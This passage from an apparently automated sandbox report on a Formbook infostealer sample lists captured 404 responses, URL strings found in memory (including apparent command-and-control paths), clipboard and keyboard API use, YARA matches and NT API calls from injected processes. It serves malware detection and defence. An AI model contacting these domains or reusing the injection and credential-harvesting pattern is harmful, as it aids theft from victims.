61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 07:26:13 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 07:26:15 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 07:26:15 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 07:26:15 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: DJonRIGNYjBRZ.exe, 00000007.00000002.4153318134.000000000495C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.nobartv6.website/pp43/?y0qt3F=/yzCblrJsERuqgz3jJaeg3gXWqInWNIu
            Source: DJonRIGNYjBRZ.exe, 00000007.00000002.4154876608.0000000005794000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.sailnway.net
            Source: DJonRIGNYjBRZ.exe, 00000007.00000002.4154876608.0000000005794000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.sailnway.net/lrst/
            Source: netbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000006.00000002.4151687754.000000000316E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000006.00000002.4151687754.000000000316E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000006.00000002.4151687754.000000000316E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000006.00000002.4151687754.000000000316E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000006.00000002.4151687754.000000000316E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000006.00000002.4151687754.000000000316E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000006.00000003.2281331663.0000000007CDB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000006.00000002.4153839675.0000000004920000.00000004.10000000.00040000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000002.4153318134.0000000003FF0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://whois.gandi.net/en/results?search=languagemodel.pro
            Source: netbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000006.00000002.4153839675.00000000042D8000.00000004.10000000.00040000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000002.4153318134.00000000039A8000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2397067589.000000000CC28000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.elsupertodo.net/2jit/?y0qt3F=iS4P4oRSl8BXKzGHIPEeBFILTgF0I4K6JXAZlPSQukWhX6ryYmutle
            Source: netbtugc.exe, 00000006.00000002.4155375798.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4153839675.0000000004920000.00000004.10000000.00040000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000002.4153318134.0000000003FF0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.gandi.net/en/domain
            Source: netbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            Source: Yara match | File source: 1.2.svchost.exe.2670000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.4151245699.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4152977911.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4152890125.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2006339526.0000000007BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2001885118.0000000002670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4152933454.00000000041F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2002697433.0000000005290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.svchost.exe.2670000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4151245699.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4152977911.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4152890125.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2006339526.0000000007BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2001885118.0000000002670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4152933454.00000000041F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2002697433.0000000005290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0269C063 NtClose
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030735C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03074340 NtSetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03074650 NtSuspendThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072BA0 NtEnumerateValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072BE0 NtQueryValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072BF0 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072AD0 NtReadFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072AF0 NtWriteFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072F30 NtCreateSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072FB0 NtResumeThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072FE0 NtCreateFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072E80 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072EE0 NtQueueApcThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072D10 NtMapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072D30 NtUnmapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072DD0 NtDelayExecution
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072C60 NtCreateKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072CA0 NtQueryInformationToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03073010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03073090 NtSetValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030739B0 NtGetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03073D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03073D70 NtOpenThread
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03614340 NtSetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03614650 NtSuspendThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612BE0 NtQueryValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612BF0 NtAllocateVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612BA0 NtEnumerateValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612AF0 NtWriteFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612AD0 NtReadFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612F30 NtCreateSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612FE0 NtCreateFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612FB0 NtResumeThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612EE0 NtQueueApcThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612E80 NtReadVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612D30 NtUnmapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612D10 NtMapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612DD0 NtDelayExecution,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612C60 NtCreateKey,LdrInitializeThunk
